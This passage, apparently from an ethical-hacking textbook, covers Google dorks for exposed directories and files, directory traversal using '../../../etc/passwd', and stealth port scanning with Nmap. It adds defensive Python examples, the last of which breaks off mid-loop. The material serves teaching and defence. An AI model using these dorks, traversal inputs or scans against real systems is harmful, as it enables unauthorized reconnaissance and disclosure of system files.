directories and files. Hackers can locate the sensitive information and
files just by simple browsing. In Google it is easy to find websites or web
servers with directory listings enabled, because the titles of the pages start
with the phrase “index of”, so we can type index of into the search box to
find websites with directory listings enabled. If we want better results
from our search we can use the combination intitle:index.of in the search
box, or we can use intitle:index.of “Parent Directory”.
Figure 4.1: The result of using intitle:index.of “Parent Directory”.33
It is obvious that with the first command we used the Google search
engine to search in its database for the websites which have been listed
with the title of “Index of”. In the second command we used Google to
search for sites with the directory listings and with the keyword which is
often found in the directory listings.
Figure 4.2: A typical directory listing
Directory listings provide a list of files and directories in a browser
window instead of the typical text-and-graphics mix generally associated
with web pages. These pages offer a great environment for deep
information gathering.
33 www.google.com
a. Locating Directory Listings
Locating directory listings with Google is fairly straightforward. Figure
4.2 shows that most directory listings begin with the phrase Index of, which
also appears in the title. An obvious query to find this type of page might
be intitle:index.of, which may find pages with the term index of in the
title of the document. Unfortunately, this query will return a large
number of false positives, such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
IowaState Entomology Index of Internet Resources
Judging from the titles of these documents, it's obvious that not only are
these web pages intentional, they're also not the directory listings we're
looking for. Several alternate queries provide more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on
index.of in the title, but on keywords often found inside directory listings,
such as parent directory, name, and size. Obviously, this search can be
combined with other searches to find files or directories located in
directory listings.
b. Finding a Specific Directory
Hackers can locate specific directories by using the directory name in
their search queries. For instance, to locate an “admin” directory in
addition to directory listings, the hacker can use these queries:
intitle:index.of.admin or intitle:index.of inurl:admin.
Figure 4.3: The result of using intitle:index.of.admin.34
c. Finding a Specific File
It is possible to search for a certain file within directory listings. For
instance, to search for the password.mdb file, this search query can be used:
intitle:index.of password.mdb
d. Finding Specific File Extension
Google lets users search its database for a specific file extension by using
the filetype: command. For instance, if you want to search for pdf files,
then you can use the query filetype:pdf in the search box.
e. Server Versioning: Obtaining the Web Server Software/Version
The exact version of the web server software running on a server is one
piece of information an attacker needs before launching a successful
attack against that web server. If an attacker connects directly to that
web server, the HTTP (web) headers from that server can provide this
essential information. It's possible, however, to retrieve similar
34 www.google.com
information from Google's cache without ever connecting to the target
server under investigation. One method involves using the information
provided in a directory listing.
Figure 4.4 shows the bottom line of a typical directory listing. Notice that
the directory listing includes the name of the server software as well as
the version. An adept web administrator can fake this information, but
often it's legitimate, allowing an attacker to determine what attacks may
work against the server.
Figure 4.4 Directory listing server
This example was gathered using the following query:
intitle:index.of server.at
This query focuses on the term index of in the title and server at
appearing at the bottom of the directory listing. This type of query can
also be pointed at a particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and
vidup-r1.blue.aol.com both run Apache web servers.
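To see what a directory listing gives away before Google indexes it, here is an added example (not from the book) that checks one page of your own site: it applies the same two signals the intitle:index.of "parent directory" query relies on, lists the entries, flags names such as password.mdb, and pulls the software version out of the "Server at" footer that the server.at query keys on. Both HTML pages are constructed samples, not fetched from any real site.

```python
import re
from html.parser import HTMLParser

# Names the chapter's queries hunt for (password.mdb, ws_ftp.log) plus common
# backup and credential patterns; extend this list for your own environment.
SENSITIVE = re.compile(r"(passw(or)?d|ws_ftp\.log|\.(bak|old|sql|mdb|env)$)", re.I)
# Apache's listing footer, the text the 'server.at' query keys on
BANNER = re.compile(r"(\S+)\s+Server at\s+(\S+)\s+Port\s+(\d+)", re.I)


class ListingParser(HTMLParser):
    """Collects the <title>, every href, and the <address> footer of one page."""

    def __init__(self):
        super().__init__()
        self.title, self.banner, self.links, self._in = "", "", [], None

    def handle_starttag(self, tag, attrs):
        if tag in ("title", "address"):
            self._in = tag
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None

    def handle_data(self, data):
        if self._in == "title":
            self.title += data
        elif self._in == "address":
            self.banner += data


def analyze_listing(html: str) -> dict:
    """Decide whether a page is an auto-generated directory listing and what it exposes."""
    p = ListingParser()
    p.feed(html)
    title = p.title.strip()
    # Same two signals as intitle:index.of "parent directory"; a page whose title
    # merely contains 'Index of' (a library index, say) fails the second test.
    is_listing = title.lower().startswith("index of") and "parent directory" in html.lower()
    # Drop Apache's sort links (?C=N;O=D), the parent link (/) and off-site links
    entries = [h for h in p.links if not h.startswith(("?", "/", "http:", "https:"))]
    m = BANNER.search(p.banner)
    return {
        "is_listing": is_listing,
        "path": title[len("index of"):].strip() if is_listing else None,
        "entries": entries if is_listing else [],
        "sensitive": [e for e in entries if SENSITIVE.search(e)] if is_listing else [],
        "server": {"software": m.group(1), "host": m.group(2), "port": int(m.group(3))} if m else None,
    }


# Constructed sample pages, not fetched from any real site.
SAMPLE_LISTING = """<html><head><title>Index of /admin</title></head><body>
<h1>Index of /admin</h1><pre>
<a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a>
<hr><a href="/">Parent Directory</a>                          -
<a href="backup/">backup/</a>          2013-01-14 09:12    -
<a href="password.mdb">password.mdb</a>  2013-01-14 09:12  12K
<a href="tour.html">tour.html</a>      2013-01-14 09:12  3.1K
<hr></pre>
<address>Apache/1.3.26 Server at www.example.com Port 80</address>
</body></html>"""

SAMPLE_FALSE_POSITIVE = """<html><head><title>Index of Native American Resources on the Internet</title>
</head><body><a href="http://example.org/a">a</a><a href="/b">b</a></body></html>"""


if __name__ == "__main__":
    for page in (SAMPLE_LISTING, SAMPLE_FALSE_POSITIVE):
        print(analyze_listing(page))
```

Run it over the response body of each URL you serve (urllib.request is enough) and any page that comes back with is_listing True and a populated server field is exactly what the chapter's queries will surface.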
It's also possible to determine the version of a web server based on
default pages installed on that server. When a web server is installed, it
generally will ship with a set of default web pages, like the Apache 1.2.6
page shown in Figure 4.5:
Figure 4.5: Apache test page35
These pages can make it easy for a site administrator to get a web server
running. By providing a simple page to test, the administrator can simply
connect to his own web server with a browser to validate that the web
server was installed correctly. Some operating systems even come with
web server software already installed. In this case, an Internet user may
not even realize that a web server is running on his machine.
This type of casual behavior on the part of an Internet user will lead an
attacker to rightly assume that the web server is not well maintained,
and by extension is insecure. By further extension, the attacker can
assume that the entire operating system of the server may be vulnerable
by virtue of poor maintenance.
The following table provides a brief rundown of some queries that can
locate various default pages.
35 www.cayelle.com
Server version           Query
Apache 1.3.0–1.3.9       intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11–1.3.26     intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0               intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS           intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
Many IIS servers         intitle:welcome.to intitle:internet IIS
Unknown IIS server       intitle:"Under construction" "does not currently have"
IIS 4.0                  intitle:welcome.to.IIS.4.0
IIS 4.0                  allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0                  allintitle:Welcome to Internet Information Server
IIS 5.0                  allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0                  allintitle:Welcome to Windows XP Server Internet Services
Many Netscape servers    allintitle:Netscape Enterprise Server Home Page
Unknown Netscape server  allintitle:Netscape FastTrack Server Home Page
4.3.4. Traversal Techniques - The next technique we’ll examine is
known as traversal. Traversal in this context simply means to travel
across. Attackers use traversal techniques to expand a small “foothold”
into a larger compromise.
a. Directory Traversal
To illustrate how traversal might be helpful, consider a directory listing
that was found with intitle:index.of inurl:“admin”, as shown in Figure 4.6.
Figure 4.6: Traversal Example Found with index.of 36
In this example, our query brings us to a relative URL of
/admin/php/tour. If you look closely at the URL, you’ll notice an “admin”
directory two directory levels above our current location. If we were to
click the “parent directory” link, we would be taken up one directory, to
the “php” directory. Clicking the “parent directory” link from the “envr”
directory would take us to the “admin” directory, a potentially juicy
directory. This is very basic directory traversal. We could explore each
and every parent directory and each of the subdirectories, looking for
juicy stuff.
Alternatively, we could use a creative site search combined with an
inurl search to locate a specific file or term inside a specific subdirectory,
36 www.google.com
such as site:anu.edu inurl:admin ws_ftp.log, for example. We could also
explore this directory structure by modifying the URL in the address bar.
Regardless of how we were to “walk” the directory tree, we would be
traversing outside the Google search, wandering around on the target
Web Server. This is basic traversal, specifically directory traversal.
Another simple example would be replacing the word admin with the
word student or public. Another more serious traversal technique could
allow an attacker to take advantage of software flaws to traverse to
directories outside the Web server directory tree. For example, if a Web
server is installed in the /var/www directory and public Web documents
are placed in /var/www/htdocs, by default any user attaching to the
Web server’s top level directory is really viewing files located in
/var/www/htdocs. Under normal circumstances, the Web server will not
allow Web users to view files above the /var/www/htdocs directory.
Now, let’s say a poorly coded third-party software product is installed on
the server that accepts directory names as arguments. A normal URL
used by this product might be
www.somesadsite.org/badcode.pl?page=/index.html. This URL would
instruct the badcode.pl program to “fetch” the file located at
/var/www/htdocs/index.html and display it to the user, perhaps with a
nifty header and footer attached. An attacker might attempt to take
advantage of this type of program by sending a URL such as
www.somesadsite.org/badcode.pl?page=../../../etc/passwd. If the
badcode.pl program is vulnerable to a directory traversal attack, it would
break out of the /var/www/htdocs directory, crawl up to the real root
directory of the server, dive down into the /etc directory, and “fetch” the
system password file, displaying it to the user with a nifty header and
footer attached!
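The badcode.pl flaw and its fix side by side, as an added illustration that is not the book's code (badcode.pl is hypothetical in the book as well): the vulnerable function appends the page parameter to the document root as-is, while the hardened one resolves the path first and refuses anything that lands outside the root. The /var/www/htdocs tree and a stand-in etc/passwd are constructed under a temporary directory, so nothing on the real system is read.

```python
import os
import tempfile


def fetch_page_vulnerable(docroot: str, page: str) -> str:
    """Mirrors badcode.pl: the user-supplied page name is appended to the docroot as-is."""
    with open(docroot + "/" + page) as f:  # '../../../etc/passwd' walks out of docroot
        return f.read()


def fetch_page_hardened(docroot: str, page: str) -> str:
    """Resolve the requested path and refuse anything that lands outside the docroot."""
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, page.lstrip("/")))
    # realpath has already collapsed '..' and followed symlinks, so a prefix
    # comparison on the resolved path is the whole check.
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"refusing {page!r}: resolves outside the document root")
    with open(target) as f:
        return f.read()


def build_demo_tree() -> tuple:
    """Constructed layout from the chapter: docroot at var/www/htdocs plus a fake
    etc/passwd, all under a temporary directory (no real system file is touched)."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "var", "www", "htdocs")
    os.makedirs(docroot)
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(docroot, "index.html"), "w") as f:
        f.write("<h1>welcome</h1>")
    with open(os.path.join(base, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")  # stand-in content, not a real passwd file
    return base, docroot


def demo() -> dict:
    """Serve a normal page, then send the chapter's traversal string to both versions."""
    _, docroot = build_demo_tree()
    out = {"normal": fetch_page_hardened(docroot, "/index.html")}
    # Three '..' from var/www/htdocs reach the (fake) root, exactly as the chapter describes
    out["vulnerable"] = fetch_page_vulnerable(docroot, "../../../etc/passwd").split(":")[0]
    try:
        fetch_page_hardened(docroot, "../../../etc/passwd")
        out["hardened"] = "served"
    except PermissionError:
        out["hardened"] = "blocked"
    return out


if __name__ == "__main__":
    print(demo())  # {'normal': '<h1>welcome</h1>', 'vulnerable': 'root', 'hardened': 'blocked'}
```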
Automated tools can do a much better job of locating these types of files
and vulnerabilities. If you’re a programmer, you will be very interested in
the Libwhisker Perl library, written and maintained by Rain Forest
Puppy (RFP) and available from www.wiretrip.net/rfp. Security Focus
wrote a great article on using Libwhisker. That article is available from
www.securityfocus.com/infocus/1798. If you aren’t a programmer, RFP’s
Whisker tool, also available from the Wiretrip site, is excellent, as are
other tools based on Libwhisker, such as nikto, written by sullo@cirt.net,
which is said to be updated even more than the Whisker program itself.
Another tool that performs file and directory mining is Wikto from
SensePost that can be downloaded
at www.sensepost.com/research/wikto. The advantage of Wikto is that it
does not suffer from false positives on Web sites that respond with
friendly 404 messages.
b. Incremental Substitution
Another technique similar to traversal is incremental substitution. This
technique involves replacing numbers in a URL in an attempt to find
directories or files that are hidden, or unlinked from other pages.
Remember that Google generally only locates files that are linked from
other pages, so if it’s not linked, Google won’t find it. As a simple
example, consider a document called exhc-1.xls, found with Google. You
could easily modify the URL for that document, changing the 1 to a 2,
making the filename exhc-2.xls. If the document is found, you have
successfully used the incremental substitution technique! In some cases
it might be simpler to use a Google query to find other similar files on the
site, but remember, not all files on the Web are in Google’s databases.
Use this technique only when you’re sure a simple query modification
won’t find the files first.
This technique does not apply only to filenames, but to just about anything
that contains a number in a URL, even parameters to scripts. Using this
technique to toy with parameters to scripts is beyond the scope of this
book, but if you’re interested in trying your hand at some simple file or
directory substitutions, scare up some test sites with queries such as
filetype:xls inurl:1.xls or intitle:index.of inurl:0001 or even an images
search for 1.jpg. Now use substitution to try to modify the numbers in
the URL to locate other files or directories that exist on the site. Here are
some examples:
■ /docs/bulletin/1.xls could be modified to /docs/bulletin/2.xls
■ /DigLib_thumbnail/spmg/hel/0001/H/ could be changed to
/DigLib_thumbnail/spmg/hel/0002/H/
■ /gallery/wel008-1.jpg could be modified to /gallery/wel008-2.jpg
c. Extension Walking
We have already discussed file extensions and how the filetype operator
can be used to locate files with specific file extensions. For example, we
could easily search for HTM files with a query such as filetype: HTM1. Once
you’ve located HTM files, you could apply the substitution technique to
find files with the same file name and a different extension. For example, if
you found /docs/index.htm, you could modify the URL to
/docs/index.asp to try to locate an index.asp file in the docs directory. If
this seems somewhat pointless, rest assured, this is, in fact, rather
pointless. We can, however, make more intelligent substitutions.
Consider the directory listing shown in Figure 4.7. This listing shows
evidence of a very common practice, the creation of backup copies of Web
pages.
Figure 4.7: Backup copies of Web pages are very common
4.4. Preventing Google Hacking Attacks
Remove all pages identified by Google hacking queries
i. Check if your website is vulnerable to attack with Acunetix
Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner ensures website security by
automatically checking for SQL injection, Cross site scripting and
other vulnerabilities. It checks password strength on authentication
pages and automatically audits shopping carts, forms, dynamic
content and other web applications. As the scan is being completed,
the software produces detailed reports that pinpoint where
vulnerabilities exist. Take a product tour or download the evaluation
version.
ii. Scanning for XSS vulnerabilities with Acunetix WVS Free
Edition!
To check whether your website has cross site scripting vulnerabilities,
download the Free Edition from http://www.acunetix.com/cross-site-
scripting/scanner.htm. This version will scan any website / web
application for XSS vulnerabilities and it will also reveal all the
essential information related to it, such as the vulnerability location
and remediation techniques.
CHAPTER 5
SCANNING
Objective
5.1 Introduction of Scanning
5.2 Types of Scanning
5.3 Methodology of Scanning
5.4 Anonymizers
5.5 HTTP Tunneling
5.6 IP Spoofing
5.1. Introduction of Scanning
Scanning is the process of proactively identifying vulnerabilities of computing
systems in a network in order to determine if and where a system can be
exploited and/or threatened. A scanner is a computer program designed to map
systems and search for weaknesses in an application, computer or
network. While public servers are important for communication and data
transfer over the Internet, they open the door to potential security
breaches by threat agents, such as malicious hackers. Vulnerability
scanning employs software that seeks out security flaws based on a
database of known flaws, testing systems for the occurrence of these
flaws and generating a report of the findings that an individual or an
enterprise can use to tighten the network’s security.
During scanning, the hacker continues to gather information regarding
the network and its individual host systems. Data such as IP addresses,
operating system, services, and installed applications can help the
hacker decide which type of exploit to use in hacking a system. Scanning
is the process of locating systems that are alive and responding on the
network. Ethical hackers use it to identify target systems’ IP addresses.
5.2. Types of Scanning
Scanning Type           Purpose
Port scanning           Determines open ports and services
Network scanning        IP addresses
Vulnerability scanning  Presence of known weaknesses
Scanning is used to determine whether a system is on the network and
available. Scanning tools are used to gather information about a system
such as IP addresses, the operating system, and services running on the
target computer. After the active and passive reconnaissance stages of
system hacking have been completed, scanning is performed.
5.2.1. Port scanning37
Port scanning can uncover a number of holes that a hacker could use
against you. Port Scanning is one of the most popular reconnaissance
techniques attackers use to discover services they can break into. Since
a port is a place where information goes into and out of a computer, port
scanning identifies open doors to a computer. Port scanning has
legitimate uses in managing networks, but port scanning also can be
malicious in nature if someone is looking for a weakened access point to
break into your computer. All machines connected to a Local Area
Network (LAN) or Internet run many services that listen at well-known
and not so well known ports. A port scan helps the attacker find which
ports are available (i.e., what service might be listening on a port).
Essentially, a port scan consists of sending a message to each port, one
at a time. The kind of response received indicates whether the port is
used and can therefore be probed further for weakness.
Port scanning is the process of identifying open and available TCP/IP
ports on a system. Port-scanning tools enable a hacker to learn about the
services available on a given system. Each service or application on a
machine is associated with a well-known port number. For example, a
port-scanning tool that identifies port 80 as open indicates a web server
is running on that system. Hackers need to be familiar with well-known
port numbers.
Note: On Windows systems, well-known port numbers are listed in the
C:\windows\system32\drivers\etc\services file. The services file is a
hidden file. To view it, show hidden files in Windows Explorer,
double-click the file, and open it with Notepad. You should know the
well-known port numbers for common applications; familiarize yourself
with the port numbers for FTP (21), Telnet (23), HTTP (80), SMTP (25),
POP3 (110), and HTTPS (443).
[37] http://www.auditmypc.com/port-scanning.asp
5.2.2. Network scanning [38]
Network scanning is a procedure for identifying active hosts on a
network, either to attack them or as a network security assessment.
Hosts are identified by their individual IP addresses. Network-scanning
tools attempt to identify all the live or responding hosts on the network
and their corresponding IP addresses. Scanning procedures, such as
ping sweeps and port scans, return information about which IP
addresses map to live hosts that are active on the Internet and what
services they offer. Another scanning method, inverse mapping, returns
information about what IP addresses do not map to live hosts; this
enables an attacker to make assumptions about viable addresses.
Scanning is one of three components of intelligence gathering for an
attacker. In the footprinting phase, the attacker creates a profile of the
target organization, with information such as its domain name system
(DNS) and e-mail servers, and its IP address range. Most of this
information is available online. In the scanning phase, the attacker finds
information about the specific IP addresses that can be accessed over the
Internet, their operating systems, the system architecture, and the
services running on each computer.
5.2.3. Vulnerability scanning [39]
Vulnerability scanning is the process of proactively identifying the
vulnerabilities of computer systems on a network. Generally, a
vulnerability scanner first identifies the operating system and version
number, including service packs that may be installed. Then, the
vulnerability scanner identifies weaknesses or vulnerabilities in the
operating system. During the later attack phase, a hacker can exploit
those weaknesses in order to gain access to the system. An intrusion
detection system (IDS) or a sophisticated network security professional
with the proper tools can detect active port-scanning activity. Scanning
tools probe TCP/IP ports looking for open ports and IP addresses, and
these probes can be recognized by most security intrusion detection
tools. Network and vulnerability scanning can usually be detected as
well, because the scanner must interact with the target system over the
network.
[38] http://searchmidmarketsecurity.techtarget.com/definition/network-scanning
[39] books.google.co.in/books?isbn=8126511966
5.3. Scanning Methodology [40]
This methodology is the process by which a hacker scans the network. It
ensures that no system or vulnerability is overlooked and that the hacker
gathers all necessary information to perform an attack. We'll look at the
various stages of this scanning methodology throughout this book,
starting with the first three steps (checking for live systems, checking
for open ports, and service identification) in the following section.
The stages of the methodology are given below:
[40] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
Figure 5.1: Scanning Methodology (stages, in order)
1. Check for Live Systems
2. Check for Open Ports
3. Service Identification
4. Banner Grabbing / OS Fingerprinting
5. Vulnerability Scanning
6. Draw Network Diagrams of Vulnerable Hosts
7. Prepare Proxies
8. Attack
Check for Live Systems
A) Ping Sweep Techniques [41]
The scanning methodology starts with checking for systems that are live
on the network, meaning that they respond to probes or connection
requests. The simplest, although not necessarily the most accurate, way
to determine whether systems are live is to perform a ping sweep of the
IP address range. A ping sweep (also known as an ICMP sweep) is a basic
network scanning technique used to determine which of a range of IP
addresses map to live hosts (computers). Whereas a single ping will tell
you whether one specified host computer exists on the network, a ping
sweep consists of ICMP (Internet Control Message Protocol) ECHO
requests sent to multiple hosts. If a given address is live, it will return an
ICMP ECHO reply. Ping sweeps are among the older and slower methods
used to scan a network.
All systems that respond with a ping reply are considered live on the
network. Internet Control Message Protocol (ICMP) scanning is the
process of sending an ICMP request or ping to all hosts on the network to
determine which ones are up and responding to pings. A benefit of ICMP
scanning is that it can be run in parallel, meaning all systems are
scanned at the same time; thus it can run quickly on an entire network.
Most hacking tools include a ping-sweep option, which essentially means
performing an ICMP request to every host on the network.
[41] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
One considerable problem with this method is that personal firewall
software and network-based firewalls can block a system from
responding to ping sweeps. Another problem is that the computer must
be on to be scanned.
B) Tools for Scanning Live Systems
Pinger, Friendly Pinger, and WS_Ping_Pro are all tools that perform ICMP
queries.
C) Detecting Ping Sweeps
Almost any IDS or intrusion prevention system (IPS) system will detect
and alert the security administrator to a ping sweep occurring on the
network. Most firewall and proxy servers block ping responses so a
hacker can’t accurately determine whether systems are available using a
ping sweep alone. More intense port scanning must be used if systems
don’t respond to a ping sweep. Just because a ping sweep doesn’t return
any active hosts on the network doesn’t mean they aren’t available—you
need to try an alternate method of identification. Remember, hacking
takes time, patience, and persistence.
5.3.1. Scanning Ports and Identifying Services
Checking for open ports is the second step in the scanning methodology.
Port scanning is the method used to check for open ports. The process of
port scanning involves probing each port on a host to determine which
ports are open. Port scanning generally yields more valuable information
than a ping sweep about the host and vulnerabilities on the system.
Service identification is the third step in the scanning methodology; it’s
usually performed using the same tools as port scanning. By identifying
open ports, a hacker can usually also identify the services associated
with that port number.
A) Scanning Ports using the Nmap Tool
i. Nmap Command Switches
Nmap is a free open source tool that quickly and efficiently performs
ping sweeps, port scanning, service identification, IP address
detection, and operating system detection. Nmap has the benefit of
scanning a large number of machines in a single session. It's
supported by many operating systems, including UNIX, Windows, and
Linux. [42] The state of a port as determined by an Nmap scan can be
open, filtered, or unfiltered.
Open means that the target machine accepts incoming requests on
that port.
Filtered means a firewall or network filter is screening the port and
preventing Nmap from discovering whether it's open.
Unfiltered means the port is determined to be closed, and no firewall or
filter is interfering with the Nmap requests.
[42] www.nmap.org
Nmap supports several types of scans, as described below:
ii. Nmap Scan Types
Nmap Scan Type      Description
TCP connect         The attacker makes a full TCP connection to the
                    target system.
XMAS tree scan      The attacker checks for TCP services by sending
                    XMAS-tree packets, which are named as such because
                    all the "lights" are on, meaning the FIN, URG and
                    PSH flags are set (the meaning of the flags will be
                    discussed later in this chapter).
SYN stealth scan    This is also known as half-open scanning. The hacker
                    sends a SYN packet and receives a SYN-ACK back from
                    the server. It's stealthy because a full TCP
                    connection isn't opened.
Null scan           This is an advanced scan that may be able to pass
                    through firewalls undetected or modified. A Null
                    scan has all flags off (not set). It only works on
                    UNIX systems.
Windows scan        This type of scan is similar to the ACK scan and can
                    also detect open ports.
ACK scan            This type of scan is used to map out firewall rules.
                    The ACK scan only works on UNIX.
Nmap has numerous command switches to perform different
types of scans. The common command switches are listed below:
Nmap Command     Scan Performed
-sT              TCP connect scan
-sS              SYN scan
-sF              FIN scan
-sX              XMAS tree scan
-sN              Null scan
-sP              Ping scan
-sU              UDP scan
-sO              Protocol scan
-sA              ACK scan
-sW              Windows scan
-sR              RPC scan
-sL              List / DNS scan
-sI              Idle scan
-P0              Don't ping
-PT              TCP ping
-PS              SYN ping
-PI              ICMP ping
-PB              TCP and ICMP ping
-PP              ICMP timestamp
-PM              ICMP netmask
-oN              Normal output
-oX              XML output
-oG              Greppable output
-oA              All output
-T Paranoid      Serial scan; 300 sec between scans
-T Sneaky        Serial scan; 15 sec between scans
-T Polite        Serial scan; 0.4 sec between scans
-T Normal        Parallel scan
-T Aggressive    Parallel scan, 300 sec timeout, and 1.25 sec/probe
-T Insane        Parallel scan, 75 sec timeout, and 0.3 sec/probe
To perform an Nmap scan, at the Windows command prompt, type nmap
followed by the target IP address and any command switches used to
perform the specific type of scan. For example, to scan the host with the
IP address 192.168.0.1 using a TCP connect scan, enter this command:
nmap 192.168.0.1 -sT
B) Port Scanning Advanced Techniques
SYN: A SYN or stealth scan is also called a half-open scan because it
doesn't complete the TCP three-way handshake. The TCP/IP three-way
handshake will be covered in the next section. A hacker sends a SYN
packet to the target; if a SYN/ACK frame is received back, then it's
assumed the target would complete the connection and the port is
listening. If a RST is received back from the target, then it's assumed
the port isn't active or is closed. The advantage of the SYN stealth scan
is that fewer IDS systems log this as an attack or connection attempt.
XMAS: Other techniques that have been used consist of XMAS scans, where
several flags in the TCP packet are set at once: an XMAS scan sends a
packet with the FIN, URG, and PSH flags set. If the port is open, there is
no response; but if the port is closed, the target responds with a
RST/ACK packet. XMAS scans work only on target systems that follow the
RFC 793 implementation of TCP/IP and don't work against any version of
Windows.
FIN : A FIN scan is similar to an XMAS scan but sends a packet with
just the FIN flag set. FIN scans receive the same response and have the
same limitations as XMAS scans. The typical TCP scan attempts to open
connections. Another technique sends erroneous packets at a port,
expecting that open listening ports will send back different error
messages than closed ports. The scanner sends a FIN packet, which
should close a connection that is open. Closed ports reply to a FIN
packet with a RST. Open ports, on the other hand, ignore the packet in
question. This is required TCP behavior.
If no service is listening at the target port, the operating system will
generate an error message. If a service is listening, the operating system
will silently drop the incoming packet. Therefore, silence indicates the
presence of a service at the port. However, since packets can be dropped
accidentally on the wire or blocked by firewalls, this isn't a very effective
scan.
NULL: A NULL scan sends a packet in which none of the flag bits are set.
The NULL scan is similar to the XMAS and FIN scans in its limitations and
responses, but it just sends a packet with no flags set.
IDLE: An IDLE scan uses a spoofed IP address to send a SYN packet to a
target. Depending on the response, the port can be determined to be
open or closed. IDLE scans determine port scan response by monitoring
IP header sequence numbers.
C) List TCP Communication Flag Types
TCP scan types are built on the TCP three-way handshake. TCP
connections require a three-way handshake before a connection can be
made and data transferred between the sender and receiver. [43]
[43] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
TCP three-way handshake
131.21.7.50:2567  ---- SYN ----->  214.21.4.1:80
131.21.7.50:2567  <-- SYN/ACK ---  214.21.4.1:80
131.21.7.50:2567  ---- ACK ----->  214.21.4.1:80
In order to complete the three-way handshake and make a successful
connection between two hosts, the sender must send a TCP packet with
the synchronize (SYN) bit set. Then, the receiving system responds with a
TCP packet with the synchronize (SYN) and acknowledge (ACK) bit set to
indicate the host is ready to receive data. The source system sends a
final packet with the acknowledge (ACK) bit set to indicate the connection
is complete and data is ready to be sent. Because TCP is a connection-
oriented protocol, a process for establishing a connection (three-way
handshake), restarting a failed connection, and finishing a connection is
part of the protocol. These protocol notifications are called flags. TCP
contains ACK, RST, SYN, URG, PSH, and FIN flags. The following list
identifies the function of the TCP flags:
SYN (Synchronize): Initiates a connection between hosts.
ACK (Acknowledge): Acknowledges an established connection between hosts.
PSH (Push): The system is forwarding buffered data.
URG (Urgent): Data in the packet must be processed quickly.
FIN (Finish): No more transmissions.
RST (Reset): Resets the connection.
A hacker can attempt to bypass detection by using flags instead of
completing a normal connection. The TCP scan types are used by some
scanning tools to elicit a response from a system by setting one or more
flags. [44]
[44] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
TCP Scan Types
TCP Scan Type                   Flags sent by hacker
XMAS scan                       All flags set (ACK, RST, SYN, URG, PSH, FIN)
FIN scan                        FIN
NULL scan                       No flags set
TCP connect / full-open scan    SYN, then ACK
SYN scan / half-open scan       SYN, then RST
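The flag combinations in the table above can be recognised mechanically from the TCP header, which is how an IDS labels these probes. The following is an added example, not code from the book or from Nmap: it decodes the flag byte of a raw TCP header and names the probe type, treating XMAS as FIN+URG+PSH (the combination given in the Nmap table and in Section B) and using constructed sample headers.

```python
"""Classify TCP probe packets by the flags they carry.

Added example, not code from the book or from Nmap: decode the flag byte
of a raw TCP header and name the scan type it matches, following the
XMAS / FIN / NULL / SYN table above.  XMAS is taken as FIN+URG+PSH, the
combination given in the Nmap table and Section B.  Sample headers are
constructed here for illustration.
"""
import struct

# Six classic flag bits of the TCP header's 13th byte (RFC 793 order).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = [("URG", URG), ("ACK", ACK), ("PSH", PSH),
              ("RST", RST), ("SYN", SYN), ("FIN", FIN)]


def parse_tcp_header(header: bytes) -> dict:
    """Decode the fixed part of a TCP header (ports, seq/ack, offset, flags)."""
    if len(header) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", header[:16])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": (off_flags >> 12) * 4,  # header length in bytes
            "flags": off_flags & 0x3F,             # mask off offset/reserved bits
            "window": window}


def build_tcp_header(sport: int, dport: int, flags: int, seq: int = 0) -> bytes:
    """Build a minimal 20-byte TCP header (checksum and urgent pointer zero)."""
    off_flags = (5 << 12) | (flags & 0x3F)         # 5 x 32-bit words, no options
    return struct.pack("!HHIIHHHH", sport, dport, seq, 0, off_flags, 1024, 0, 0)


def flag_names(flags: int) -> list:
    """Names of the flags set in a flag byte, in header bit order."""
    return [name for name, bit in FLAG_NAMES if flags & bit]


def classify_probe(flags: int) -> str:
    """Name the scan type a single unsolicited TCP segment's flags suggest.

    Only the first segment of an exchange is judged here; a bare SYN is a
    legitimate connection attempt as well as a SYN/connect scan probe, so
    the caller must also look at the volume of probes across ports.
    """
    if flags == 0:
        return "NULL scan (no flags set)"
    if flags == FIN:
        return "FIN scan (FIN only)"
    if flags == FIN | URG | PSH:
        return "XMAS scan (FIN, URG, PSH)"
    if flags == SYN:
        return "SYN probe (SYN scan, connect scan or ordinary connection attempt)"
    if flags == ACK:
        return "ACK probe (ACK scan, used to map firewall rules)"
    return "not a scan signature (" + ", ".join(flag_names(flags)) + ")"


# Constructed sample probes, all aimed at port 80 from source port 2567.
SAMPLE_HEADERS = [
    build_tcp_header(2567, 80, SYN),
    build_tcp_header(2567, 80, FIN | URG | PSH),
    build_tcp_header(2567, 80, FIN),
    build_tcp_header(2567, 80, 0),
    build_tcp_header(2567, 80, ACK),
    build_tcp_header(2567, 80, SYN | ACK),   # a reply, not a probe
]


def classify_headers(headers) -> list:
    """Classify each raw header; returns one label per header."""
    return [classify_probe(parse_tcp_header(h)["flags"]) for h in headers]


if __name__ == "__main__":
    for hdr in SAMPLE_HEADERS:
        f = parse_tcp_header(hdr)
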